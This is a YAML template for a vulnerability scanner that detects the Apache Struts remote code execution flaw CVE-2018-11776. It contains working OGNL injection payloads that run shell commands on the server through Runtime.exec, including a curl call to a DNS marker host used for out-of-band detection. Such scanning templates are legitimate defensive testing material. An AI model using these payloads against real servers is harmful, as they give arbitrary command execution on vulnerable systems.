CVE-2018-11776.yaml

collect:
  - uniq:
    - [ URI ]
match:
  - "ACTION_EXT_value": 'action'
generate:
  - into:
    - PATH
  - payload:
    - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
    ('curl DNS_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new  java.io.Bu\
    fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
    ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"

    - "${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec\
    ('echo STR_MARKER').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new  java.io.Bu\
    fferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionC\
    ontext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}"

    - '${CALC_MARKER}'
  - method:
    - replace
detect:
  - oob:
    - dns
  - response:
    - body: STR_MARKER
    - body: CALC_MARKER
meta-info:
  - type: rce
  - threat: 90
  - applicable_for:
    - fast
    - scanner
  - tags: 
    - Remote Code Execution
    - CVE-2018-11776
    - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16